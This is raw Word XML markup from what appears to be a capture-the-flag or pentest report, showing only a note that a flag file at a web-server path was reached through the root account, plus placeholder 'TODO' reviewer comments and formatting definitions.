    <w:p w14:paraId="18D015E8" w14:textId="4CABBF62" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r>
        <w:t>/var/www/html/data/flag</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4,jpg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="285F6A27" w14:textId="45541A9D" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Through root account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DD67D" w14:textId="2F0E62E4" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649B9A35" wp14:editId="32C86855">
            <wp:extent cx="5943600" cy="3285490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1563179306"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9306" name="Picture 14"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99B6D5B" w14:textId="77777777" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="0061682E" w:rsidP="0061682E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidSect="003719FB">
      <w:headerReference w:type="default" r:id="rId60"/>
      <w:footerReference w:type="default" r:id="rId61"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="14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indsay Von Tish" w:date="2023-05-01T12:03:00Z" w:initials="LVT">
    <w:p w14:paraId="12936655" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00CE2152">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="17" w:author="Lindsay Von Tish" w:date="2023-05-01T12:03:00Z" w:initials="LVT">
    <w:p w14:paraId="29EFDA82" w14:textId="77777777" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="18" w:author="Lindsay Von Tish" w:date="2023-05-01T12:03:00Z" w:initials="LVT">
    <w:p w14:paraId="6ECBA3F7" w14:textId="77777777" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="19" w:author="Lindsay Von Tish" w:date="2023-05-01T12:03:00Z" w:initials="LVT">
    <w:p w14:paraId="0809290E" w14:textId="77777777" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="20" w:author="Lindsay Von Tish" w:date="2023-05-01T14:15:00Z" w:initials="LVT">
    <w:p w14:paraId="38A0AEE5" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00CA45A1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="21" w:author="Lindsay Von Tish" w:date="2023-05-01T12:03:00Z" w:initials="LVT">
    <w:p w14:paraId="6E1C0381" w14:textId="77777777" w:rsidR="00DD64D1" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="22" w:author="Lindsay Von Tish" w:date="2023-05-01T14:15:00Z" w:initials="LVT">
    <w:p w14:paraId="04694CBF" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="23" w:author="Lindsay Von Tish" w:date="2023-05-01T14:15:00Z" w:initials="LVT">
    <w:p w14:paraId="56B1F3CF" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="24" w:author="Lindsay Von Tish" w:date="2023-05-01T14:15:00Z" w:initials="LVT">
    <w:p w14:paraId="13F16850" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="25" w:author="Lindsay Von Tish" w:date="2023-05-01T14:15:00Z" w:initials="LVT">
    <w:p w14:paraId="2F3B77CA" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">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36655" w15:done="1"/>
  <w15:commentEx w15:paraId="29EFDA82" w15:done="1"/>
  <w15:commentEx w15:paraId="6ECBA3F7" w15:done="1"/>
  <w15:commentEx w15:paraId="0809290E" w15:done="1"/>
  <w15:commentEx w15:paraId="38A0AEE5" w15:done="0"/>
  <w15:commentEx w15:paraId="6E1C0381" w15:done="1"/>
  <w15:commentEx w15:paraId="04694CBF" w15:done="0"/>
  <w15:commentEx w15:paraId="56B1F3CF" w15:done="0"/>
  <w15:commentEx w15:paraId="13F16850" w15:done="0"/>
  <w15:commentEx w15:paraId="2F3B7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28FD" w16cex:dateUtc="2023-05-01T17:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FABE41" w16cex:dateUtc="2023-05-01T17:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FABF14" w16cex:dateUtc="2023-05-01T17:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FAC011" w16cex:dateUtc="2023-05-01T17:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FA4808" w16cex:dateUtc="2023-05-01T19:15:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FAC08F" w16cex:dateUtc="2023-05-01T17:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FA4856" w16cex:dateUtc="2023-05-01T19:15:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FA4855" w16cex:dateUtc="2023-05-01T19:15:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FA9BA3" w16cex:dateUtc="2023-05-01T19:15:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27FA9BA2" w16cex:dateUtc="2023-05-01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36655" w16cid:durableId="27FA28FD"/>
  <w16cid:commentId w16cid:paraId="29EFDA82" w16cid:durableId="27FABE41"/>
  <w16cid:commentId w16cid:paraId="6ECBA3F7" w16cid:durableId="27FABF14"/>
  <w16cid:commentId w16cid:paraId="0809290E" w16cid:durableId="27FAC011"/>
  <w16cid:commentId w16cid:paraId="38A0AEE5" w16cid:durableId="27FA4808"/>
  <w16cid:commentId w16cid:paraId="6E1C0381" w16cid:durableId="27FAC08F"/>
  <w16cid:commentId w16cid:paraId="04694CBF" w16cid:durableId="27FA4856"/>
  <w16cid:commentId w16cid:paraId="56B1F3CF" w16cid:durableId="27FA4855"/>
  <w16cid:commentId w16cid:paraId="13F16850" w16cid:durableId="27FA9BA3"/>
  <w16cid:commentId w16cid:paraId="2F3B77CA" w16cid:durableId="27FA9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FF73" w14:textId="77777777" w:rsidR="002C5863" w:rsidRDefault="002C5863" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="52C015C7" w14:textId="77777777" w:rsidR="002C5863" w:rsidRDefault="002C5863" w:rsidP="003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10138"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7DB0BE8A" w14:textId="089F4E6E" w:rsidR="003719FB" w:rsidRDefault="00371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A178" w14:textId="4746AEE7" w:rsidR="003719FB" w:rsidRDefault="003719FB" w:rsidP="003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D684" w14:textId="77777777" w:rsidR="002C5863" w:rsidRDefault="002C5863" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="543E4B39" w14:textId="77777777" w:rsidR="002C5863" w:rsidRDefault="002C5863" w:rsidP="0037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1F8A" w14:textId="5C6A8EDB" w:rsidR="003719FB" w:rsidRDefault="003719FB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="78A94884" w14:textId="269DCDCE" w:rsidR="003719FB" w:rsidRDefault="003719FB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="005264D0">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37C6A416" wp14:editId="508C9AC1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="margin">
            <wp:posOffset>-495300</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1628775" cy="397510"/>
          <wp:effectExtent l="0" t="0" r="9525" b="254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397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71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038EDD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D7C9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCDAEABE"/>
    <w:lvl w:ilvl="0" w:tplc="3222CDB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAD613CC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E954BE1C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DE7E439C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0D0C041E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="417C892E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="210E7A5A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="71264316" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F7C85430" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="076E3EDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3CA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7C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F62A26C"/>
    <w:lvl w:ilvl="0" w:tplc="1D6E5BCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1532628A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DF7414D2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0CA448D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6E22819E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="32069BF2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28BE60FE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="63C62592" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C50A8378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09512542"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ACE924C"/>
    <w:lvl w:ilvl="0" w:tplc="32CE8E92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="076054E6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5946284A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1D6419C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="72524BA0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9CECB38E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CABAE868" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="89286BBA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="383E1E38" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11121DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="933C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E3D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="426ED74A"/>
    <w:lvl w:ilvl="0" w:tplc="32B83CA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2514BF28" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FA4AA9DC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F2847B84" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E320CDDE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46E88C80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7E72639E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2A0EA18E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="68B8CE80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17A12AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D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4DC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA4F6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B3513D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD9A59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17730F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B976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27FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A2431F0"/>
    <w:lvl w:ilvl="0" w:tplc="A1BC3B5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6E68EC0A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D5CC8A56" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
